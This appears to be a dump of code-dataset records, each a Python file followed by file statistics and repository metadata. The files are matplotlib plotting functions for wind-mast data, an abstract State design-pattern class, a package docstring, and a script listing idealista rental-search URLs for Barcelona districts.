    ticks = np.linspace(0, ylim, 4)
    ax.set_yticks(ticks)
    ax.set_yticklabels([str(round(t, 1)) for t in ticks])

    return fig, ax, leg
def monthly_rose_fig(metdat, catinfo, category=None, vertloc=80, bins=6, nsector=36, ylim=None, noleg=False):
    """**Get Monthly Wind Rose Figure**.

    Plot a 4x3 grid (one subplot per month) of wind roses of a given category
    of variables at the given height.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string) [default: None]: Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        5. bins (integer, list) [default: 6]: Number of equally spaced bins, or explicit bin edges, for the variable.
        6. nsector (integer) [default: 36]: Number of direction sectors in each rose.
        7. ylim (float) [default: None]: Maximum frequency value; lets multiple roses share uniform limits.
        8. noleg (Boolean) [default: False]: Currently unused here; kept for signature parity with rose_fig.

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. axes (list): The windrose axes objects, one per month.
        3. leg (Matplotlib Legend): The legend object.
    """
    # set up data
    dircol, _, _ = utils.get_vertical_locations(catinfo['columns']['direction'], location=vertloc)
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)

    plotdat = metdat.groupby(metdat.index.month)
    winddir = plotdat[dircol]
    var = plotdat[varcol]
    months = utils.monthnames()

    # get var divisions set up
    if isinstance(bins, int):
        nbins = bins
    else:
        nbins = len(bins)

    # set up plotting colors
    colors = utils.get_colors(nbins - 1, basecolor='span')
    colors += ['#3A4246']  # add something dark to the end.
    colors = tuple(colors[0:nbins])

    fig = plt.figure(figsize=(9, 13))
    for iax, month in enumerate(months):
        ax = fig.add_subplot(4, 3, iax + 1, projection="windrose")
        # BUG FIX: honor the nsector argument (was hard-coded to 36)
        ax.bar(winddir.get_group(iax + 1), var.get_group(iax + 1),
               bins=bins, nsector=nsector, colors=colors,
               linewidth=0.35,
               normed=True)

        # Set the tick labels font
        for label in (ax.get_xticklabels() + ax.get_yticklabels()):
            label.set_fontname('Arial')
            label.set_fontsize(12)
        ax.set_title(month, fontsize=12, y=1.15)

        # attach the legend to November's subplot so it sits near the bottom
        if iax == 10:
            leg = plt.legend(loc=8, ncol=2, bbox_to_anchor=(0.5, -0.65), frameon=False)
            leg.set_title(catinfo['labels'][category])

    fig.text(0.5, -0.085, r'$z={}$ m'.format(vertloc), ha='center', va='center')

    # NOTE(review): recovering the axes via figure children ordering is fragile
    # but preserved from the original implementation — verify if windrose changes.
    axes = fig.get_children()[1:]

    # adjust plot for specified max frequency: default to the largest limit seen
    if ylim is None:
        ylim = 0.0
        for iax, month in enumerate(months):
            ylim = np.max([ylim, axes[iax].get_ylim()[-1]])

    for iax, month in enumerate(months):
        axes[iax].set_ylim(0, ylim)
        axes[iax].set_yticks(np.linspace(0.0, ylim, 4))
        axes[iax].set_yticklabels([str(np.round(x, decimals=1)) for x in axes[iax].get_yticks()])

    fig.tight_layout()

    return fig, axes, leg
def winddir_scatter(metdat, catinfo, category, vertloc=80, basecolor='red', exclude_angles=[(46, 228)]):
    """**Get Wind Direction Scatter Figure**.

    Scatter a variable against wind direction at the given height, shading
    excluded direction sectors.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string): Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float): Describes the desired vertical location along the tower for analysis.
        5. basecolor (string): Provides the color code information to get from "utils.py".
        6. exclude_angles (tuple, list): Start/stop angle pairs to shade out per IEC standards.

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    # resolve column names at the requested measurement height
    dircol, _, _ = utils.get_vertical_locations(catinfo['columns']['direction'], location=vertloc)
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    nrelcolors = utils.get_nrelcolors()

    fig = plt.figure(figsize=(8, 2.5))
    ax = fig.add_subplot(111)
    ax.scatter(metdat[dircol], metdat[varcol], marker='o', facecolor='w', color='k', lw=0.5, alpha=0.7)
    ax.set_xlim([0, 360])

    # shade the excluded IEC wind-direction sectors
    for start, stop in exclude_angles:
        ax.axvspan(start, stop, alpha=0.1, color=nrelcolors[basecolor][0])

    ax.set_title(r'$z={}$ m'.format(vertloc))
    ax.set_xlabel(r'Wind Direction [$^\circ$]')
    ax.set_ylabel(catinfo['labels'][category])

    return fig, ax
def stability_winddir_scatter(metdat, catinfo, category, vertloc=80, basecolor='red', exclude_angles=[(46, 228)]):
    """**Get Wind Direction Stability Scatter Figure**.

    Scatter a variable against wind direction, one subplot per stability
    class, shading excluded direction sectors.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string): Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        5. basecolor (string) [default: 'red']: Provides the color code information to get from "utils.py".
        6. exclude_angles (tuple, list) [default: [(46, 228)]]: Start/stop angle pairs to shade out per IEC standards.

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    stabconds = utils.get_stabconds()
    condcolors = utils.get_colors(len(stabconds), basecolor='span')
    nrelcolors = utils.get_nrelcolors()

    # resolve column names at the requested measurement height
    dircol, _, _ = utils.get_vertical_locations(catinfo['columns']['direction'], location=vertloc)
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    stabcol, _, _ = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)

    fig, ax = plt.subplots(len(stabconds), 1, sharex=True, sharey=True, figsize=(6, 8))
    axlist = ax.flatten()
    grouped = metdat.groupby(stabcol)

    for ind, cond in enumerate(stabconds):
        axi = axlist[ind]
        axi.scatter(grouped[dircol].get_group(cond), grouped[varcol].get_group(cond),
                    marker='o', facecolor=condcolors[ind], color='k', lw=0.5, alpha=0.7)
        axi.set_xlim([0, 360])
        axi.legend([cond], fontsize=12, loc=1, frameon=False)
        # shade the excluded IEC wind-direction sectors
        for start, stop in exclude_angles:
            axi.axvspan(start, stop, alpha=0.1, color=nrelcolors[basecolor][0])
        if ind == 0:
            axi.set_title(r'$z={}$ m'.format(vertloc))

    fig.tight_layout()
    fig.text(0.5, 0, r'Wind Direction [$^\circ$]', ha='center', va='center')
    fig.text(0, 0.5, catinfo['labels'][category], ha='center', va='center', rotation='vertical')

    return fig, ax
def groupby_scatter(metdat, catinfo, category, abscissa='direction', groupby='ti', nbins=5, vertloc=80, basecolor='span'):
    """**Get Wind Direction Grouped Scatter Figure**.

    Scatter a variable against an abscissa variable, colored by bins of a
    third (grouping) variable.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string): Specifies the category of information that is desired for plotting.
        4. abscissa (string) [default: 'direction']: Independent variable to plot against.
        5. groupby (string) [default: 'ti']: Category to group (bin) by.
        6. nbins (integer) [default: 5]: Number of bins to divide the groupby variable into.
        7. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        8. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    # set up data: resolve all three column names at the requested height
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    groupcol, _, _ = utils.get_vertical_locations(catinfo['columns'][groupby], location=vertloc)
    abscol, _, _ = utils.get_vertical_locations(catinfo['columns'][abscissa], location=vertloc)

    # BUG FIX: honor the nbins argument (was hard-coded to 5)
    groupbins = pd.cut(metdat[groupcol], nbins)
    plotdat = metdat[[varcol, abscol, groupcol]].groupby(groupbins)
    groups = list(plotdat.indices.keys())
    colors = utils.get_colors(len(groups), basecolor=basecolor)

    fig, ax = plt.subplots(figsize=(5, 3))
    for iax, group in enumerate(groups):
        ax.scatter(plotdat[abscol].get_group(group), plotdat[varcol].get_group(group),
                   facecolor=colors[iax], color='k', lw=0.5, alpha=0.7)

    leg = ax.legend(groups, loc=6, bbox_to_anchor=(1, 0.5), frameon=False)
    leg.set_title(catinfo['labels'][groupby])

    # labels
    ax.set_xlabel(catinfo['labels'][abscissa])
    ax.set_ylabel(catinfo['labels'][category])
    ax.set_title(r'$z={}$ m'.format(vertloc))
    fig.tight_layout()

    return fig, ax
def hist(metdat, catinfo, category, vertloc=80, basecolor='blue'):
    """**Get Histogram Figure**.

    Plot a percentage-weighted histogram of a variable at the given height.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string): Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        5. basecolor (string) [default: 'blue']: Provides the color code information to get from "utils.py".

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    colors = utils.get_nrelcolors()
    color = colors[basecolor][0]

    # set up data
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    data = metdat[varcol].dropna(how='any')

    fig, ax = plt.subplots(figsize=(5, 3))
    # BUG FIX: weight each observation by 100/N so the axis actually reads in
    # percent, matching the 'Frequency [%]' label and monthly_hist.
    ax.hist(data,
            bins=35,
            facecolor=color,
            edgecolor='k',
            weights=np.ones(len(data)) / len(data) * 100, density=False)
    ax.set_title(r'$z={}$ m'.format(vertloc))
    fig.text(0, 0.5, 'Frequency [%]', rotation='vertical', ha='center', va='center')
    fig.text(0.5, 0, catinfo['labels'][category], ha='center', va='center')
    fig.tight_layout()

    return fig, ax
def monthly_hist(metdat, catinfo, category, vertloc=80, basecolor='blue'):
    """**Get Monthly Histogram Figure**.

    Plot a 4x3 grid (one subplot per month) of percentage-weighted histograms
    of a variable at the given height, with shared bin edges.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string): Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        5. basecolor (string) [default: 'blue']: Provides the color code information to get from "utils.py".

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    colors = utils.get_nrelcolors()
    color = colors[basecolor][0]
    months = utils.monthnames()

    # set up data
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    bymonth = metdat.groupby(metdat.index.month)[varcol]

    # BUG FIX: np.arange(min, max, width) excludes max, so the largest
    # observations fell beyond the last bin edge and were silently dropped.
    # linspace includes both endpoints: 36 edges -> 35 bins, as in hist().
    valid = metdat[varcol].dropna()
    bins = np.linspace(valid.min(), valid.max(), 36)

    fig, ax = plt.subplots(4, 3, figsize=(9, 9), sharex=True, sharey=True)
    for im, month in enumerate(months):
        data = bymonth.get_group(im + 1).dropna()
        ax.flatten()[im].hist(data,
                              bins=bins,
                              color=color,
                              edgecolor='k',
                              weights=np.ones(len(data)) / len(data) * 100)
        ax.flatten()[im].set_title(month, fontsize=12)

    fig.tight_layout()
    fig.text(0, 0.5, 'Frequency [%]', rotation='vertical', ha='center', va='center')
    fig.text(0.5, 0, catinfo['labels'][category], ha='center', va='center')

    return fig, ax
def hist_by_stability(metdat, catinfo, category, vertloc=80, basecolor='span'):
    """**Get Stability Grouped Histogram Figure**.

    Plot one percentage-weighted histogram per stability class (stacked
    vertically as subplots) of a variable at the given height.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string): Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.
        5. basecolor (string) [default: 'span']: Provides the color code information to get from "utils.py".

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    stabconds = utils.get_stabconds()
    stabcol, _, _ = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    colors = utils.get_colors(len(stabconds), basecolor=basecolor)

    # don't shadow the metdat parameter with the groupby object (the original
    # rebound `metdat`, which obscured the DataFrame for later maintenance)
    grouped = metdat.groupby(stabcol)

    fig, ax = plt.subplots(len(stabconds), 1, figsize=(4, 6), sharex=True, sharey=True)
    for ii, stab in enumerate(stabconds):
        data = grouped[varcol].get_group(stab).dropna()
        # BUG FIX: weight by 100/N so the shared y-axis actually reads in
        # percent, matching the 'Frequency [%]' label.
        ax.flatten()[ii].hist(data,
                              facecolor=colors[ii],
                              edgecolor='k',
                              bins=50,
                              weights=np.ones(len(data)) / len(data) * 100,
                              density=False)
        ax.flatten()[ii].legend([stab], fontsize=10, frameon=False)

    ax.flatten()[0].set_title(r'$z={}$m'.format(vertloc))
    fig.text(-0.03, 0.5, 'Frequency [%]', rotation='vertical', ha='center', va='center')
    fig.text(0.5, 0, catinfo['labels'][category], ha='center', va='center')
    fig.tight_layout()

    return fig, ax
def stacked_hist_by_stability(metdat, catinfo, category, vertloc=80):
    """**Get Stacked Stability Grouped Histogram Figure**.

    Plot a single stacked, density-normalized histogram of a variable at the
    given height, with one stack segment per stability class.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string): Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float): Describes the desired vertical location along the tower for analysis.

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    stabconds = utils.get_stabconds()
    stabcol, _, _ = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    colors = utils.get_colors(len(stabconds), basecolor='span')

    grouped = metdat.groupby(stabcol)

    # one column per stability class, aligned on the original time index
    bycond = pd.DataFrame({cond: grouped[varcol].get_group(cond) for cond in stabconds})

    fig, ax = plt.subplots()
    bycond.plot.hist(ax=ax,
                     stacked=True,
                     color=colors,
                     bins=35,
                     edgecolor='k',
                     legend=False,
                     density=True)

    ax.set_xlabel(catinfo['labels'][category])
    ax.set_title(r'$z={}$m'.format(vertloc))
    fig.legend(stabconds, loc=6, bbox_to_anchor=(1, 0.5), frameon=False)
    fig.tight_layout()

    return fig, ax
def monthly_stacked_hist_by_stability(metdat, catinfo, category, vertloc=80):
    """**Get Monthly Stacked Stability Grouped Histogram Figure**.

    Plot a 4x3 grid (one subplot per month) of stacked, density-normalized
    histograms of a variable at the given height, one stack segment per
    stability class.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. category (string): Specifies the category of information that is desired for plotting.
        4. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    stabconds = utils.get_stabconds()
    stabcol, _, _ = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
    varcol, vertloc, _ = utils.get_vertical_locations(catinfo['columns'][category], location=vertloc)
    colors = utils.get_colors(len(stabconds), basecolor='span')
    months = utils.monthnames()

    # two-level group: (month 1-12, stability class)
    grouped = metdat.groupby([metdat.index.month, stabcol])[varcol]

    fig, ax = plt.subplots(4, 3, figsize=(9, 10), sharex=True, sharey=True)
    for iax, month in enumerate(months):
        axi = ax.flatten()[iax]
        frame = pd.DataFrame({cond: grouped.get_group((iax + 1, cond)) for cond in stabconds})
        frame.plot.hist(ax=axi,
                        stacked=True,
                        color=colors,
                        bins=35,
                        edgecolor='k',
                        legend=False,
                        density=True)
        axi.set_title(month)
        axi.set_ylabel('')

    fig.text(0, 0.58, 'Frequency', ha='center', va='center', fontsize=14, rotation='vertical')
    leg = fig.legend(stabconds, loc=9, bbox_to_anchor=(0.55, 0.15), frameon=False)
    fig.tight_layout()
    fig.subplots_adjust(bottom=0.21)
    fig.text(0.5, 0.16, catinfo['labels'][category], ha='center', va='center', fontsize=14)

    return fig, ax
def normalized_hist_by_stability(metdat, catinfo, vertloc=80):
    """**Get Normalized Stability Grouped Histogram Figure**.

    Plot, per hour of day, the normalized frequency of each stability class
    as a stacked bar chart.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    stabconds = utils.get_stabconds()
    stabcol, _, _ = utils.get_vertical_locations(catinfo['columns']['stability flag'], location=vertloc)
    colors = utils.get_colors(len(stabconds), basecolor='span')

    flags = metdat[stabcol].dropna()

    # fraction of each stability class within each hour of day
    freqs = flags.groupby(flags.index.hour).value_counts(normalize=True)
    freqs.index.names = ['hour', 'stabclass']
    freqs = freqs.reorder_levels(['stabclass', 'hour'])

    hours = np.arange(24)
    newbottom = np.zeros(24)

    fig, ax = plt.subplots()
    for jj, cond in enumerate(stabconds):
        # reindex fills hours with no observations with 0; this replaces the
        # original hand-rolled insert loop and also works for complete data
        frac = freqs.loc[cond].reindex(hours, fill_value=0.0)
        ax.bar(hours, frac, color=colors[jj], bottom=newbottom)
        newbottom += frac.to_numpy()

    ax.set_ylabel('Probability [%]')
    ax.set_xlabel('Time of Day [Hour]')
    fig.legend(stabconds)
    fig.tight_layout()

    return fig, ax
def normalized_monthly_hist_by_stability(metdat, catinfo, vertloc=80):
    """**Get Normalized Monthly Stability Grouped Histogram Figure**.

    Plot a 4x3 grid of subplots (one per month), each showing the hourly
    normalized distribution of stability classes as a stacked bar chart.

    Parameters:
        1. metdat (Pandas DataFrame): The desired input data (Met Mast).
        2. catinfo (dictionary): Categorization information for the desired input data. Holds column names, labels, units, and save names.
        3. vertloc (integer, float) [default: 80]: Describes the desired vertical location along the tower for analysis.

    Returns:
        1. fig (Matplotlib Figure): The figure object for the desired input data and categories.
        2. ax (Matplotlib Axes): The axes object for the desired input data and categories.
    """
    months = utils.monthnames()
    hours = np.arange(24)
    stabcol, _, _ = utils.get_vertical_locations(
        catinfo['columns']['stability flag'], location=vertloc)
    stabconds = utils.get_stabconds()
    # CONSISTENCY FIX: size the palette from the actual number of stability
    # conditions (was a hard-coded 5), matching normalized_hist_by_stability.
    colors = utils.get_colors(len(stabconds), basecolor='span')

    temp = metdat[stabcol].dropna()
    # Fraction of each stability class within every (month, hour) cell.
    plotdata = temp.groupby(
        [temp.index.month.rename('month'), temp.index.hour.rename('hour')]
    ).value_counts(normalize=True)
    plotdata.index.names = ['month', 'hour', 'stabclass']
    temp = plotdata.reorder_levels(['month', 'stabclass', 'hour'])

    # Reindex onto the complete (month, condition, hour) grid so missing
    # combinations plot as zero-height bars.
    indexvals = [np.arange(1, 13), stabconds, np.arange(24)]
    indx = pd.MultiIndex.from_product(indexvals, names=['month', 'stabclass', 'hour'])
    temp = temp.reindex(index=indx).fillna(0.0)

    fig, ax = plt.subplots(4, 3, figsize=(9, 10), sharex=True, sharey=True)
    for ii, month in enumerate(months):
        newbottom = np.zeros(24)
        for jj, cond in enumerate(stabconds):
            pdat = temp.loc[ii + 1, cond]  # months are 1-indexed in the data
            ax.flatten()[ii].bar(hours, pdat, color=colors[jj], bottom=newbottom)
            newbottom += pdat

    fig.text(-0.02, 0.58, 'Probability [%]', ha='center', va='center', rotation='vertical')
    leg = fig.legend(stabconds, loc=9, bbox_to_anchor=(0.55, 0.125), frameon=False)
    fig.tight_layout()
    fig.subplots_adjust(bottom=0.21)
    fig.text(0.5, 0.165, 'Time of Day [Hour]', ha='center', va='center')

    return fig, ax
###########################################
# End of Code
###########################################
| 46.293515
| 190
| 0.665266
| 5,429
| 40,692
| 4.934426
| 0.076626
| 0.032849
| 0.041435
| 0.052484
| 0.81918
| 0.784986
| 0.745493
| 0.71563
| 0.695845
| 0.679794
| 0
| 0.018448
| 0.21272
| 40,692
| 879
| 191
| 46.293515
| 0.817768
| 0.450826
| 0
| 0.494898
| 0
| 0
| 0.070935
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045918
| false
| 0.017857
| 0.017857
| 0
| 0.109694
| 0.015306
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8fa98b2bff82b11fb8787efe5b31e6e365b6732d
| 603
|
py
|
Python
|
Python/behavioral_patterns/state/state.py
|
ploukareas/Design-Patterns
|
8effde38d73ae9058c3028c97ef395644a90d55b
|
[
"BSD-3-Clause",
"MIT"
] | 28
|
2018-09-28T07:45:35.000Z
|
2022-02-12T12:25:05.000Z
|
Python/behavioral_patterns/state/state.py
|
ploukareas/Design-Patterns
|
8effde38d73ae9058c3028c97ef395644a90d55b
|
[
"BSD-3-Clause",
"MIT"
] | null | null | null |
Python/behavioral_patterns/state/state.py
|
ploukareas/Design-Patterns
|
8effde38d73ae9058c3028c97ef395644a90d55b
|
[
"BSD-3-Clause",
"MIT"
] | 5
|
2021-05-10T23:19:55.000Z
|
2022-03-04T20:26:35.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ˅
from abc import *
# ˄
class State(object, metaclass=ABCMeta):
    """Abstract State role of the GoF State pattern.

    Concrete subclasses implement each operation; ``context`` is the object
    that holds the current state and delegates these calls to it.
    """
    # ˅
    # ˄

    @abstractmethod
    def set_time(self, context, hour):
        """Notify the state of the current hour (may trigger a state change)."""
        # ˅
        pass
        # ˄

    @abstractmethod
    def use(self, context):
        """Handle a 'use' request for the given context."""
        # ˅
        pass
        # ˄

    @abstractmethod
    def alarm(self, context):
        """Handle an 'alarm' request for the given context."""
        # ˅
        pass
        # ˄

    @abstractmethod
    def phone(self, context):
        """Handle a 'phone' request for the given context."""
        # ˅
        pass
        # ˄

    @abstractmethod
    def to_string(self):
        """Return a human-readable name for this state."""
        # ˅
        pass
        # ˄
# ˅
# ˄
# ˅
# ˄
| 11.596154
| 39
| 0.426202
| 65
| 603
| 4.2
| 0.461538
| 0.274725
| 0.32967
| 0.29304
| 0.457875
| 0.373626
| 0.373626
| 0
| 0
| 0
| 0
| 0.002959
| 0.439469
| 603
| 51
| 40
| 11.823529
| 0.751479
| 0.129353
| 0
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0.294118
| 0.058824
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
8ff60646e88d5f0d4605742533e793a7f2db3c11
| 37
|
py
|
Python
|
queenbee/io/__init__.py
|
AntoineDao/queenbee
|
800d5b26a69cffbce85864ea9430304b7fb8d11a
|
[
"MIT"
] | 10
|
2020-12-17T06:08:46.000Z
|
2022-02-12T12:06:08.000Z
|
queenbee/io/__init__.py
|
AntoineDao/queenbee
|
800d5b26a69cffbce85864ea9430304b7fb8d11a
|
[
"MIT"
] | 213
|
2020-12-06T03:34:01.000Z
|
2022-03-28T01:07:41.000Z
|
queenbee/io/__init__.py
|
AntoineDao/queenbee
|
800d5b26a69cffbce85864ea9430304b7fb8d11a
|
[
"MIT"
] | 4
|
2019-08-14T22:10:29.000Z
|
2020-09-21T22:46:11.000Z
|
"""Input and Output (IO) objects."""
| 18.5
| 36
| 0.621622
| 5
| 37
| 4.6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 37
| 1
| 37
| 37
| 0.71875
| 0.810811
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
64ed48116f1da6b622a6e28ee7f1b0bb87aec93d
| 8,326
|
py
|
Python
|
p.py
|
Xapurri/WebScrapper
|
abf1ac075f46c2b0be607c04f9b768c4ac100866
|
[
"MIT"
] | null | null | null |
p.py
|
Xapurri/WebScrapper
|
abf1ac075f46c2b0be607c04f9b768c4ac100866
|
[
"MIT"
] | null | null | null |
p.py
|
Xapurri/WebScrapper
|
abf1ac075f46c2b0be607c04f9b768c4ac100866
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sun May 3 16:09:48 2020
@author: Xapurri
"""
'Gràcia','Eixample','Gràcia','Horta-Guinardó','Les Corts','Nou Barris','Sant Andreu','Sant Martí','Sarria-Sant Gervasi','Sants-Montjuíc','Ciutat Vella'
import pyautogui as gui, pyperclip, time, keyboard
'''
DretaEixample = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-dreta-de-l-eixample/pagina-'
AntEsqEixample = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/l-antiga-esquerra-de-l-eixample/pagina-'
NovEsqEixample = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-nova-esquerra-de-l-eixample/pagina-'
SagradaFamilia = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/la-sagrada-familia/pagina-'
SantAntoni = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/sant-antoni/pagina-'
FortPienc = 'https://www.idealista.com/alquiler-viviendas/barcelona/eixample/el-fort-pienc/pagina-'
Gracia = 'https://www.idealista.com/alquiler-viviendas/barcelona/gracia/pagina-'
HortaGuinardo = 'https://www.idealista.com/alquiler-viviendas/barcelona/horta-guinardo/pagina-'
LesCorts = 'https://www.idealista.com/alquiler-viviendas/barcelona/les-corts/pagina-'
NouBarris = 'https://www.idealista.com/alquiler-viviendas/barcelona/nou-barris/pagina-'
SantAndreu = 'https://www.idealista.com/alquiler-viviendas/barcelona/sant-andreu/pagina-'
SantMarti = 'https://www.idealista.com/alquiler-viviendas/barcelona/sant-marti/pagina-'
SGGalvany = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sant-gervasi-galvany/pagina-'
PutxetFarro = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/el-putxet-i-el-farro/pagina-'
SGBonanova = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sant-gervasi-la-bonanova/pagina-'
Sarria = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/sarria/pagina-'
TresTorres = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/les-tres-torres/pagina-'
Tibidabo = 'https://www.idealista.com/alquiler-viviendas/barcelona/sarria-sant-gervasi/vallvidrera-el-tibidabo-i-les-planes/pagina-'
SantsMontjuic = 'https://www.idealista.com/alquiler-viviendas/barcelona/sants-montjuic/pagina-'
CiutatVella = 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/'
Raval = 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/el-raval/pagina-'
Gotic = 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/el-gotic/pagina-'
SantaCaterinaIRibera = 'https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/sant-pere-santa-caterina-i-la-ribera/pagina-'
ciutat-vella/la-barceloneta = https://www.idealista.com/alquiler-viviendas/barcelona/ciutat-vella/la-barceloneta/pagina-
'''
nameDistrito = ['Tibidabo','Gracia','Sants-Montjuic','La Barceloneta','El Raval','El Gotic', 'Sant Pere,Santa Caterina','Sant Gervasi-Galvany','El Putxet i el Farro','La Bonanova','Sarria','Les Tres Torres','La Dreta de Eixample','La nova esquerra de Eixample','La Nova Esquerra Eixample','Sagrada Familia','Sant antoni','El Fort Pienc','Horta-Guinardo','Les Corts','Nou Barris','Sant Andreu','Sant MArti']
